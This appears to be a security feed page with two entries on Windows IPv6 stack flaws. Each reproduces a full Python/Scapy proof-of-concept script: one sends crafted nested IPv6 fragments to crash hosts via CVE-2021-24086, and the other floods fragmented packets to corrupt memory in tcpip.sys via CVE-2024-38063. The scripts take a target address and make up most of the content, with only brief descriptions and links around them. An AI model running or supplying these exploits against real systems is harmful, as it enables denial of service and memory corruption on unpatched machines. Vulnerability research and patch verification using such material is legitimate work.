Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

2024-09-23T14:33:18.463400+00:00

[Analysis of a denial of service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html). This issue, whose root cause can be found in the mishandling of IPv6 fragments, was patched by Microsoft in their February 2021 security bulletin. ### Proof of Concept ```python import sys import random from scapy.all import * FRAGMENT_SIZE = 0x400 LAYER4_FRAG_OFFSET = 0x8 NEXT_HEADER_IPV6_ROUTE = 43 NEXT_HEADER_IPV6_FRAG = 44 NEXT_HEADER_IPV6_ICMP = 58 def get_layer4(): er = ICMPv6EchoRequest(data = "PoC for CVE-2021-24086") er.cksum = 0xa472 return raw(er) def get_inner_packet(target_addr): inner_frag_id = random.randint(0, 0xffffffff) print("**** inner_frag_id: 0x{:x}".format(inner_frag_id)) raw_er = get_layer4() # 0x1ffa Routing headers == 0xffd0 bytes routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1) routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG)) # First inner fragment header: offset=0, more=1 FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP) return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id def send_last_inner_fragment(target_addr, inner_frag_id): raw_er = get_layer4() ip = IPv6(dst = target_addr) # Second (and last) inner fragment header: offset=1, more=0 FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP) send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:]) def trigger(target_addr): inner_packet, inner_frag_id = get_inner_packet(target_addr) ip = IPv6(dst = target_addr) hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG) outer_frag_id = random.randint(0, 0xffffffff) fragmentable_part = [] for i in range(len(inner_packet) // FRAGMENT_SIZE): fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE]) if len(inner_packet) % FRAGMENT_SIZE: fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:]) print("Preparing frags...") frag_offset = 0 frags_to_send = [] is_first = True for i in range(len(fragmentable_part)): if i == len(fragmentable_part) - 1: more = 0 else: more = 1 FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE) blob = raw(FH/fragmentable_part[i]) frag_offset += FRAGMENT_SIZE frags_to_send.append(ip/hopbyhop/blob) print("Sending {} frags...".format(len(frags_to_send))) for frag in frags_to_send: send(frag) print("Now sending the last inner fragment to trigger the bug...") send_last_inner_fragment(target_addr, inner_frag_id) if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: cve-2021-24086.py ') sys.exit(1) trigger(sys.argv[1]) ```

Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys

2024-09-23T14:33:18.463338+00:00

[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), a RCE in tcpip.sys patched on August 13th 2024. An [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) published on August 27, 2024 by Marcus Hutchins. PoC published on GitHub on August 24, 2024. ### Implementation Implementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py). ```python from scapy.all import * iface='' ip_addr='' mac_addr='' num_tries=20 num_batches=20 def get_packets_with_mac(i): frag_id = 0xdebac1e + i first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)]) second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa' third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1) return [first, second, third] def get_packets(i): if mac_addr != '': return get_packets_with_mac(i) frag_id = 0xdebac1e + i first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)]) second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa' third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1) return [first, second, third] final_ps = [] for _ in range(num_batches): for i in range(num_tries): final_ps += get_packets(i) + get_packets(i) print("Sending packets") if mac_addr != '': sendp(final_ps, iface) else: send(final_ps, iface) for i in range(60): print(f"Memory corruption will be triggered in {60-i} seconds", end='\r') time.sleep(1) print("") ```

Most recent activity.

Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys